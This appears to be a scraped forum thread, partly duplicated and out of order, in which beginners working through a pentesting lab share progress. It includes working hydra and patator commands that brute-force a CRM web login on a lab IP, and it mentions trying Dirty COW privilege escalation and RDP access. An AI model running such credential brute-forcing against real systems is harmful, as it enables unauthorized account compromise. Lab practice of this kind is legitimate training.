I need your help again, just a tips not the solution.
How can i access to the rdp in the dir directory? I can't find a way to connect to the .1 and the .3
and the .2 didn't answer with xfreerdp or another rdp software.
Hello, for me this command line works fine: hydra 192.168.101.10 http-form-post "/index.php?module=Users&action=Login:username=^USER^&password=^PASS^:Invalid username or password." -l admin -P passtemp.txt -t 10 -w 10 -o hydra-http-post-attack.txt -s 88 -V
Hello, I'm a french user and a true beginner in pentesting.
First: Sorry for my spelling and congrats for finishing this course.
By the way, you can answer in Ru, i use the google translator, and it works fine.
With your help and a with a lot of fail, i've found the CRM token, i use patator (best i find to avoid false positive in brute force method)
I manage to gain access to Office2 server and i'm stuck here.
I know i have to find a method to gain access to log file where the user name is (auth.txt?). I'm looking for a solution since the last tow days.
I have tried dirtycow, but with no gcc compiler, i use a virtual machine to compile it, but no success @ all. How can i have access to this var/log dir?
THx for the answer :)
Regards,
Areop
I need your help again, just a tips not the solution.
How can i access to the rdp in the dir directory? I can't find a way to connect to the .1 and the .3
and the .2 didn't answer with xfreerdp or another rdp software.
Regards,
Areop
./patator.py http_fuzz method=POST url=«http://192.168.101.10:88/index.php?module=Users&action=Login» body='username=admin&password=FILE0' 0=passtemp.txt -t 1 -x ignore:code=302,fgrep='Location: index.php?module=Users&parent=Settings&view=Login&error=1' -l /root/Bureau/patator/patator-master/tmp/
./patator.py http_fuzz method=POST url=«http://192.168.101.10:88/index.php?module=Users&action=Login» body='username=admin&password=FILE0' 0=100K.txt -t 50 -x retry:code=xxx -x quit:size=492 --max-retries=-1
hydra 192.168.101.10 http-form-post "/index.php?module=Users&action=Login:username=^USER^&password=^PASS^:Invalid username or password." -l admin -P passtemp.txt -t 10 -w 10 -o hydra-http-post-attack.txt -s 88 -V
Hope it will help a little.
Ad Tokens find.
Let's try to find the rest :)
I have access to the other network :) :) :)
Thank you very much :)
First: Sorry for my spelling and congrats for finishing this course.
By the way, you can answer in Ru, i use the google translator, and it works fine.
With your help and a with a lot of fail, i've found the CRM token, i use patator (best i find to avoid false positive in brute force method)
I manage to gain access to Office2 server and i'm stuck here.
I know i have to find a method to gain access to log file where the user name is (auth.txt?). I'm looking for a solution since the last tow days.
I have tried dirtycow, but with no gcc compiler, i use a virtual machine to compile it, but no success @ all. How can i have access to this var/log dir?
Thx again :)